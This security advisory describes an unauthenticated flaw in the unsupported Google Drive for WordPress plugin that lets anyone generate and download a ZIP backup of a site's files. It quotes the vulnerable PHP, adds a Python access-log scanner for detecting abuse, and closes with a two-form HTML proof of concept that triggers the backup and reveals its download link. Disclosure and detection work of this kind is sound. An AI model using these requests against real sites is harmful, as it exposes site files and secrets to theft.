Yesterday we had a request on this website for a file that would be at /wp-content/plugins/wp-google-drive/gdrive-ajaxs.php, which is a file from the plugin Google Drive for WordPress (wp-google-drive). Just about a month ago we had provided more details on an arbitrary file deletion vulnerability in that plugin, which had been incorrectly labeled by the discoverer, Lenon Leite, as being a remote code execution (RCE) vulnerability. When exploiting that vulnerability you would send a request to that particular file, but based on past experience, that type of vulnerability is not one hackers would likely be interested in exploiting. While hackers’ level of interest in that type of vulnerability could have changed, what seems more likely is that someone either thought it was an RCE vulnerability, since those have been likely to be exploited in the past, or that a hacker had realized something else in that plugin was exploitable and of more interest.
In looking at what else was accessible through that file we didn’t see anything that looks likely to be exploited, but we did notice another vulnerability.
In that file, different code is run depending on the value of the POST input “ajaxstype”. One of those values runs code that performs a backup:
case 'ontimebackup':
    $bkp = new gd_take_backup('ontime_backup');
    $backup = $bkp->schedule_time_backup();
    break;
The function schedule_time_backup(), which is located in the file /class/backup-class.php, will by default create a ZIP file backup of the website’s files in the directory /wp-content/backup/, with a filename based on the server’s current time as returned by the function time(). While it would be easy enough to iterate through the possible values of the filename and download the generated file, it turns out that downloading the backup file is even easier than that, as the code used in the previously disclosed arbitrary file deletion vulnerability ends with a call to a function that lists the files in the directory and even provides a download link:
case 'del_fl_bkp':
    gd_delete_listById($_POST['id']);
    $dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH."/".$_POST['file_name'];
    @unlink( $dir );
    $dbkp = new settings_option;
    $dbkp->file_manage_list();
    break;
The plugin doesn’t appear to have been supported for years, so we haven’t attempted to notify the developer of this vulnerability.
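For anyone checking whether the behavior described above has already been triggered against a site, the following Python is an added example (not code from the original post or from the plugin) that scans a web server access log for the two-step pattern: POST requests to gdrive-ajaxs.php followed, from the same client, by a successful download of a ZIP from /wp-content/backup/ whose name is a UNIX timestamp. It assumes the server logs in the Apache/nginx combined format; the log lines, IP addresses and timestamps are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumption: the web server writes the Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
AJAX_FILE = "/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php"
# The plugin names backups after time(), i.e. a 10-digit UNIX timestamp, in /wp-content/backup/.
BACKUP_RE = re.compile(r"^/wp-content/backup/\d{10}\.zip$")

def parse_line(line):
    """Parse one combined-format log line into a dict; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec

def find_backup_exposure(lines, window_s=3600):
    """Per client IP: POSTs to the ajax file, plus backup ZIPs fetched within window_s of one."""
    by_ip = defaultdict(lambda: {"ajax_hits": 0, "zip_downloads": []})
    last_ajax = {}  # ip -> time of its most recent POST to the ajax file
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == AJAX_FILE:
            by_ip[rec["ip"]]["ajax_hits"] += 1
            last_ajax[rec["ip"]] = rec["ts"]
        elif BACKUP_RE.match(rec["path"]) and rec["status"].startswith("2"):
            t0 = last_ajax.get(rec["ip"])
            if t0 is not None and 0 <= (rec["ts"] - t0).total_seconds() <= window_s:
                by_ip[rec["ip"]]["zip_downloads"].append(rec["path"])
    return {ip: v for ip, v in by_ip.items() if v["ajax_hits"]}

# Constructed sample log: one client hits the ajax file twice, then fetches a backup ZIP.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2019:13:55:36 +0000] "POST /wp-content/plugins/wp-google-drive/gdrive-ajaxs.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2019:13:55:40 +0000] "POST /wp-content/plugins/wp-google-drive/gdrive-ajaxs.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2019:13:55:45 +0000] "GET /wp-content/backup/1562766936.zip HTTP/1.1" 200 48213904 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jul/2019:14:02:11 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print(find_backup_exposure(SAMPLE_LOG.splitlines()))
```

Access logs do not record POST bodies, so the “ajaxstype” value itself is not visible; any POST to that file from a client that then pulls a timestamp-named ZIP is the signal worth reviewing, along with whatever is currently sitting in /wp-content/backup/.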
Proof of Concept
The following proof of concept will provide a link to a ZIP file containing the website’s files.
This request will generate the backup (make sure to replace “[path to WordPress]” with the location of WordPress):
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php" method="POST">
<input type="hidden" name="ajaxstype" value="ontimebackup" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
This request provides a link to download the backup:
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php" method="POST">
<input type="hidden" name="ajaxstype" value="del_fl_bkp" />
<input type="submit" value="Submit" />
</form>
</body>
</html>